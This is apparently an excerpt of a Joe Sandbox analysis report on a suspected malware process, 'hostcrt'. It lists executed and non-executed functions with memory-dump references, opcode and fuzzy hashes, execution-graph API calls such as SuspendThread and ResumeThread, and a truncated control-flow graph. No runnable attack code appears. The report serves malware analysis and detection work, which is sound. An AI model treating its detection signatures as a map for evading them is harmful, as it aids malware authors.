                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42e7845fdf54c9394e3df90c32b58d9feb71ae81d491016eba410a3e1a02ebf6
                                                            • Instruction ID: 47d36ecb51ea8d4173ede59a570dd7f479da5f434d44a111f972de81436564c1
                                                            • Opcode Fuzzy Hash: 42e7845fdf54c9394e3df90c32b58d9feb71ae81d491016eba410a3e1a02ebf6
                                                            • Instruction Fuzzy Hash: F511E721B18A094FDB69EB64A4215FE7390FF94315B50077ED08AC30D2CF28A61A87C0
                                                            Function 00007FFD9C1CDF70 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c8760d0a7ee62e87e56dd4beac32e78eda62ab63a82110e94b4370b4a95fd56
                                                            • Instruction ID: 8d80a31fee68165faf2dc9243d2b0ca8aec571fca4e191907beb1b71aa66772c
                                                            • Opcode Fuzzy Hash: 3c8760d0a7ee62e87e56dd4beac32e78eda62ab63a82110e94b4370b4a95fd56
                                                            • Instruction Fuzzy Hash: C3119422A58E0A8FDB65FB6494656F973E1FF94355B10477EE08AD30D2CE29E90683C0
                                                            Function 00007FFD9C1CDDEE Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 253d0d8c25c68f0400e0028c8e07477230c743b86796c712b8e76fefb4828e73
                                                            • Instruction ID: 935063bf349832b417d173df3978b23441eb9553dc49d69f21369e26f93164b7
                                                            • Opcode Fuzzy Hash: 253d0d8c25c68f0400e0028c8e07477230c743b86796c712b8e76fefb4828e73
                                                            • Instruction Fuzzy Hash: F9112B32358A0A8FE715EA5CE4543F97390FB95325F20437FD946C31D0CB66A95287C0
                                                            Function 00007FFD9C1C1DEE Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 548464d7092298f7fcab7e44ce20dc631bc2fb862f728a1741ee62fa42178abf
                                                            • Instruction ID: 000604d660d371ee19ee280dc13fa02be68369cdc8495ed63434075edfde719b
                                                            • Opcode Fuzzy Hash: 548464d7092298f7fcab7e44ce20dc631bc2fb862f728a1741ee62fa42178abf
                                                            • Instruction Fuzzy Hash: 8F11663238C64A4FE71ADA68E4243E87790EB85364F20037FD949C31D0CB25A66687C0
                                                            Function 00007FFD9C1C72A8 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1578cd98cbf3f08d3bb5a9e2dc5ba291dff6529c8ee4e4625dde455f9eb4290e
                                                            • Instruction ID: 316d4587aad20c967c85277795e096be4ea6cfb2799d794c5c68e49538cf5be2
                                                            • Opcode Fuzzy Hash: 1578cd98cbf3f08d3bb5a9e2dc5ba291dff6529c8ee4e4625dde455f9eb4290e
                                                            • Instruction Fuzzy Hash: B701D232F08A4B5BF770B6A884682BE76B1DF45380F10057AF00BF7192DE69A8068785
                                                            Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48b71a4939b93e3734629cf06c25fe499545c203b0ce2f9267f5a936c466a930
                                                            • Instruction ID: 53a645df64a4d8510af1f98e0592610902f22900bad85c9cc6bf1c5f0f56d139
                                                            • Opcode Fuzzy Hash: 48b71a4939b93e3734629cf06c25fe499545c203b0ce2f9267f5a936c466a930
                                                            • Instruction Fuzzy Hash: EE116631B0E68E8BE721FBA8C8212FD7760EF41310F014676D155AB2E2CE782209CB84
                                                            Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1d7be09d8c7aacc975266b38741bf727cec82534da4801fc6f6f8ca6194f2407
                                                            • Instruction ID: 965a1a36654266f4883aebacaaf52b820b05482e512d0c6c87756c9d3157da47
                                                            • Opcode Fuzzy Hash: 1d7be09d8c7aacc975266b38741bf727cec82534da4801fc6f6f8ca6194f2407
                                                            • Instruction Fuzzy Hash: 17016871A0E68E8FE721FBA8C8102FD7760EF41310F004176D111AB2E2CE782304CB84
                                                            Function 00007FFD9C1CAABD Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8277d8a2babfa9e994804f0e597685f395287e499c85922fffe59b3e4ce720fa
                                                            • Instruction ID: 317c1b11c600754c1e97fbfb989f1e224162722561cefaef0e10d8fcd2a87f0e
                                                            • Opcode Fuzzy Hash: 8277d8a2babfa9e994804f0e597685f395287e499c85922fffe59b3e4ce720fa
                                                            • Instruction Fuzzy Hash: F9014C53F8C9874FE776B7A484711B47AB1EF24350B0401BAE09AD65D3DD0DB944C349
                                                            Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3b398061657d2e0b5dcc19cbc3c25c9ef96e4f894fbe26abbde9faf8728d369
                                                            • Instruction ID: 801ca592f26422c6c6b74c6571616f8431a128d9d8b45db53404e53c2c2e0b0b
                                                            • Opcode Fuzzy Hash: a3b398061657d2e0b5dcc19cbc3c25c9ef96e4f894fbe26abbde9faf8728d369
                                                            • Instruction Fuzzy Hash: 8301F774E0E68E8BE721FBA4C8502FD7760EF45314F004676D555972E6DE786304C745
                                                            Function 00007FFD9BACA5F4 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b776c91dea8943949fc951bc8a6412fc1989da9e0b2b844cca6ae29a1d7d875a
                                                            • Instruction ID: 82e2cc4b5005da51a930baf18d0192cdd85e1e144def47c359d5d0dd61ac1532
                                                            • Opcode Fuzzy Hash: b776c91dea8943949fc951bc8a6412fc1989da9e0b2b844cca6ae29a1d7d875a
                                                            • Instruction Fuzzy Hash: 7311FB71E0552D8BEB74EF54CC986A877B1EF94305F1102F6D009A72A5CB752E85CF44
                                                            Function 00007FFD9BAC510C Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7d2b26e095e8e0714fc510f5c2d4167c10e6fc061e24b5b98ee6eea0583d91e
                                                            • Instruction ID: f59aad744a96869c5a279cc19ad01fa8df5673309b02237d50444c19d1b0e45c
                                                            • Opcode Fuzzy Hash: d7d2b26e095e8e0714fc510f5c2d4167c10e6fc061e24b5b98ee6eea0583d91e
                                                            • Instruction Fuzzy Hash: 85115370D1652D8EEBB4EB54C8A47F9B6B2EB94301F1100E9D04DA32A1CEB62BD48F45
                                                            Function 00007FFD9C1C05D2 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 058c6e5b4020b7d02cee3068ed070155c850f1aff13225877ab31b0c354b5fb2
                                                            • Instruction ID: 29fb6fd3185fb67ae2a400774504fd43958d6051d9bc4eda251663ab2e5eb0bc
                                                            • Opcode Fuzzy Hash: 058c6e5b4020b7d02cee3068ed070155c850f1aff13225877ab31b0c354b5fb2
                                                            • Instruction Fuzzy Hash: 4AF0C83248E2C69FD3139FF0C8614D93FB0AF43240B0500F6E055C70A2C66D1616C761
                                                            Function 00007FFD9C1CCD00 Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6293d703752e6c0bdec5b5e6935b5ab24c322ad9422715fef4d5a2be0e944cb4
                                                            • Instruction ID: 635ac3853a032c801391f456f5bc25121991a21011a1cbd60d56f1aae428014a
                                                            • Opcode Fuzzy Hash: 6293d703752e6c0bdec5b5e6935b5ab24c322ad9422715fef4d5a2be0e944cb4
                                                            • Instruction Fuzzy Hash: DEF06670908A5DCFDF99EB98C894AACBBB1FF68341F20019DC00AEB251CB31A841DF40
                                                            Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8369f7d0af45854e1701b151fca5b6e802f329b0bfd6b98825e1989e2b01e8db
                                                            • Instruction ID: 7d4e43992d829bff17e8ff0a435be01cb8350ff4840179db15ac461885da08c4
                                                            • Opcode Fuzzy Hash: 8369f7d0af45854e1701b151fca5b6e802f329b0bfd6b98825e1989e2b01e8db
                                                            • Instruction Fuzzy Hash: AAF03030A0950E9FEF60FF98D4596FD77A0FFA4704F110536E41CC21A0DAB46690CB84
                                                            Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a8e1442993c08d0733d5346c27a000c371e7a601b12eddb07d1c8f134f6f914
                                                            • Instruction ID: f4a836ffd10de926ba626299bc4015c1ef76a85e4bb6d000b7d9720123878f9d
                                                            • Opcode Fuzzy Hash: 5a8e1442993c08d0733d5346c27a000c371e7a601b12eddb07d1c8f134f6f914
                                                            • Instruction Fuzzy Hash: 8EF01230A1554E9FDF90EFA4C4496FE77E0FF54304F014576E81CD2160DA70A6A0CB80
                                                            Function 00007FFD9C1CCFEF Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                            • Instruction ID: 40674578a258cdff930352caf857f1912cea28c0a453078278929946f19e0486
                                                            • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                            • Instruction Fuzzy Hash: DCF0D47490A95DDFCF55EBA8C85AE99BBB0FF68310F1001DDD00AEB262CA319885CF40
                                                            Function 00007FFD9BAC7127 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction ID: 185ce5294de830b624b0521d6d218ba8e00f4cf4c3ceee80234e85e8bcde725d
                                                            • Opcode Fuzzy Hash: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction Fuzzy Hash: 27F06670E1A51E8EFB64EB54C858BB9B7B1EB54300F1140F9D10EA7292CAB41A818F04
                                                            Function 00007FFD9C1CAB25 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60a5d55376e8e4adb481b01c18ab1d629addd0e951df4c9f440713412b1c21ad
                                                            • Instruction ID: ec6178105735021b94f5458fd9b0a77fe19cb9148c0e73cc8241ddae55b125a5
                                                            • Opcode Fuzzy Hash: 60a5d55376e8e4adb481b01c18ab1d629addd0e951df4c9f440713412b1c21ad
                                                            • Instruction Fuzzy Hash: 3CE0D83285D3CE8BD772EB5089651EC7F30FF10340F5401E7E54917182DB2457189642
                                                            Function 00007FFD9C1CD2F7 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e75e36e3e70d43bbe3793815842850ea5bf99c0eaaf147d65bea9a421ebe19d
                                                            • Instruction ID: 9b9be3b8c440bc5384ffeccd68433c2346946427713ac210aee1ad447a783df1
                                                            • Opcode Fuzzy Hash: 3e75e36e3e70d43bbe3793815842850ea5bf99c0eaaf147d65bea9a421ebe19d
                                                            • Instruction Fuzzy Hash: 1DE01292B4D7C75BF73667B449B10786BB1CF0B3C8B1905FAE156AA1C3C95838059315
                                                            Function 00007FFD9C1CDDCB Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                            • Instruction ID: fa9db4cf8c9864fdb10d9c23dc8297df6b1c03ce716b24f59087fba13470aaf2
                                                            • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                            • Instruction Fuzzy Hash: DAD0C912F9D51786F5397A81807023D61B16F00781E2040BEF19F61CC1CD2CB442A20A
                                                            Function 00007FFD9C1C1DCB Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef602be45c5daad6e6d9d5ceea16fb9b86f164603364167e8cbf28f06f24f544
                                                            • Instruction ID: 1fe42b5a39cfe80048b7cfcc06c3fb878ab853362fcb2d05f9191ebf2111088f
                                                            • Opcode Fuzzy Hash: ef602be45c5daad6e6d9d5ceea16fb9b86f164603364167e8cbf28f06f24f544
                                                            • Instruction Fuzzy Hash: B5D0C912BCD51786FA3D76D1803423D61B06F50782E70407EE19FA18C1CE6C7541E60A
                                                            Function 00007FFD9BAC5046 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction ID: 08da0d96024522e385e8501c0fb1f5a89b6e093fd3f6074e67388f7507b587ea
                                                            • Opcode Fuzzy Hash: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction Fuzzy Hash: 3DD05E30D0602D9EEBB4AB40C9603F871A19F50300F0600B9D00D231A0CEB91FC08E45
                                                            Function 00007FFD9BAC4FB2 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction ID: 08da0d96024522e385e8501c0fb1f5a89b6e093fd3f6074e67388f7507b587ea
                                                            • Opcode Fuzzy Hash: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction Fuzzy Hash: 3DD05E30D0602D9EEBB4AB40C9603F871A19F50300F0600B9D00D231A0CEB91FC08E45
                                                            Function 00007FFD9C1C12DF Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5988918ca1876faf778c637488988e2861fecc3da555aaeeec38c0290d4ff25b
                                                            • Instruction ID: 57f9c71d311991917724c38e1c96207ae7b3b1cc2d2d6e04a2bdd74636d9f5d9
                                                            • Opcode Fuzzy Hash: 5988918ca1876faf778c637488988e2861fecc3da555aaeeec38c0290d4ff25b
                                                            • Instruction Fuzzy Hash: 2CC02B01F8D3538BF23822F4487003C13B01F07240B740571E107DA2C3CCAC78009318

                                                            Non-executed Functions

                                                            Function 00007FFD9BC6773D Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad49db3052418b24583a6095ae1576d0e42114369b499ce554ce9c5e8c323e32
                                                            • Instruction ID: c529f681dba3c97a3017f2db46feda3d81eb1e2e7f2139148e07273f36179e64
                                                            • Opcode Fuzzy Hash: ad49db3052418b24583a6095ae1576d0e42114369b499ce554ce9c5e8c323e32
                                                            • Instruction Fuzzy Hash: 9F414CA680E7C69FD3539B709C666953FB0AF13204F0F44DBD4C1CB0A3E5689A59C762
                                                            Function 00007FFD9BC6BC7D Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c684ef5592533b4ddd027f1a66d16f4705adac1063d11bf2201fa3fbdeae732
                                                            • Instruction ID: 4dfcd06048235c21309077157c6d2be40ae77777c51f1101824a512eb41bbc37
                                                            • Opcode Fuzzy Hash: 5c684ef5592533b4ddd027f1a66d16f4705adac1063d11bf2201fa3fbdeae732
                                                            • Instruction Fuzzy Hash: 1E31C370E18A1DCFCF84DF98D491AEDBBF1FB69300F21116AE419E7295CA35A941CB44

                                                            Execution Graph

                                                            Execution Coverage:4.1%
                                                            Dynamic/Decrypted Code Coverage:33.3%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:12
                                                            Total number of Limit Nodes:0
                                                            execution_graph 28308 7ffd9bc7d6bd 28309 7ffd9bc7d6cb SuspendThread 28308->28309 28311 7ffd9bc7d7a4 28309->28311 28312 7ffd9bc7edfc 28313 7ffd9bc7ee33 ResumeThread 28312->28313 28315 7ffd9bc7ef04 28313->28315 28304 7ffd9bc7ef59 28305 7ffd9bc7ef67 FindCloseChangeNotification 28304->28305 28307 7ffd9bc7f044 28305->28307 28300 7ffd9bc80ba5 28301 7ffd9bc80bbf GetFileAttributesW 28300->28301 28303 7ffd9bc80c85 28301->28303

                                                            Executed Functions

                                                            Function 00007FFD9C1D2B7A Relevance: .7, Instructions: 744COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 159 7ffd9c1d2b7a-7ffd9c1d2b88 160 7ffd9c1d2b8e-7ffd9c1d2b9f 159->160 161 7ffd9c1d2ebf-7ffd9c1d2f06 159->161 162 7ffd9c1d2bb5-7ffd9c1d2bbc 160->162 163 7ffd9c1d2ba1-7ffd9c1d2ba5 160->163 174 7ffd9c1d2f0b-7ffd9c1d2fa1 161->174 166 7ffd9c1d2b74-7ffd9c1d2eb5 162->166 167 7ffd9c1d2bbe-7ffd9c1d2bd4 162->167 163->161 164 7ffd9c1d2bab-7ffd9c1d2bb3 163->164 164->162 166->161 169 7ffd9c1d2bda-7ffd9c1d2be2 167->169 170 7ffd9c1d2c64-7ffd9c1d2c94 167->170 169->161 172 7ffd9c1d2be8-7ffd9c1d2bfa 169->172 181 7ffd9c1d2c9a-7ffd9c1d2c9b 170->181 182 7ffd9c1d2d3e-7ffd9c1d2d47 170->182 172->161 175 7ffd9c1d2c00-7ffd9c1d2c17 172->175 186 7ffd9c1d2fac-7ffd9c1d2fef 174->186 187 7ffd9c1d2f26-7ffd9c1d2fa6 174->187 177 7ffd9c1d2c19-7ffd9c1d2c20 175->177 178 7ffd9c1d2c57-7ffd9c1d2c5e 175->178 177->161 180 7ffd9c1d2c26-7ffd9c1d2c54 177->180 178->169 178->170 180->178 188 7ffd9c1d2c9e-7ffd9c1d2cb4 181->188 184 7ffd9c1d2d4d-7ffd9c1d2d53 182->184 185 7ffd9c1d2e7f-7ffd9c1d2e85 182->185 184->161 190 7ffd9c1d2d59-7ffd9c1d2d68 184->190 192 7ffd9c1d2e0b-7ffd9c1d2e0f 185->192 193 7ffd9c1d2e87-7ffd9c1d2e8d 185->193 206 7ffd9c1d2ff1-7ffd9c1d3033 186->206 187->186 204 7ffd9c1d2f48-7ffd9c1d2fa8 187->204 188->161 189 7ffd9c1d2cba-7ffd9c1d2cde 188->189 195 7ffd9c1d2d31-7ffd9c1d2d38 189->195 196 7ffd9c1d2ce0-7ffd9c1d2d03 189->196 198 7ffd9c1d2e72-7ffd9c1d2e79 190->198 199 7ffd9c1d2d6e-7ffd9c1d2d75 190->199 197 7ffd9c1d2e12-7ffd9c1d2e2f 192->197 200 7ffd9c1d2e94-7ffd9c1d2ea5 193->200 201 7ffd9c1d2e8f 193->201 195->182 195->188 196->161 212 7ffd9c1d2d09-7ffd9c1d2d2f 196->212 197->161 203 7ffd9c1d2e35-7ffd9c1d2e50 197->203 198->184 198->185 199->161 205 7ffd9c1d2d7b-7ffd9c1d2d85 199->205 201->200 203->197 208 7ffd9c1d2e52-7ffd9c1d2e68 203->208 204->186 216 7ffd9c1d2f6c-7ffd9c1d2faa 204->216 214 7ffd9c1d2d8c-7ffd9c1d2d97 205->214 223 7ffd9c1d3035-7ffd9c1d3046 call 7ffd9c214828 206->223 224 7ffd9c1d3048 206->224 208->161 213 7ffd9c1d2e6a-7ffd9c1d2e6e 208->213 212->195 212->196 213->198 217 7ffd9c1d2d99-7ffd9c1d2db0 214->217 218 7ffd9c1d2dd6-7ffd9c1d2de5 214->218 216->186 228 7ffd9c1d2f8d-7ffd9c1d2fa0 216->228 217->161 222 7ffd9c1d2db6-7ffd9c1d2dd2 217->222 218->161 220 7ffd9c1d2deb-7ffd9c1d2e0a 218->220 220->192 222->217 226 7ffd9c1d2dd4 222->226 227 7ffd9c1d3051-7ffd9c1d30f7 223->227 224->227 226->208 244 7ffd9c1d3227-7ffd9c1d3244 227->244 245 7ffd9c1d30fd-7ffd9c1d3102 227->245 246 7ffd9c1d324a-7ffd9c1d324f 244->246 247 7ffd9c1d3551-7ffd9c1d3595 244->247 248 7ffd9c1d349d-7ffd9c1d34a0 245->248 249 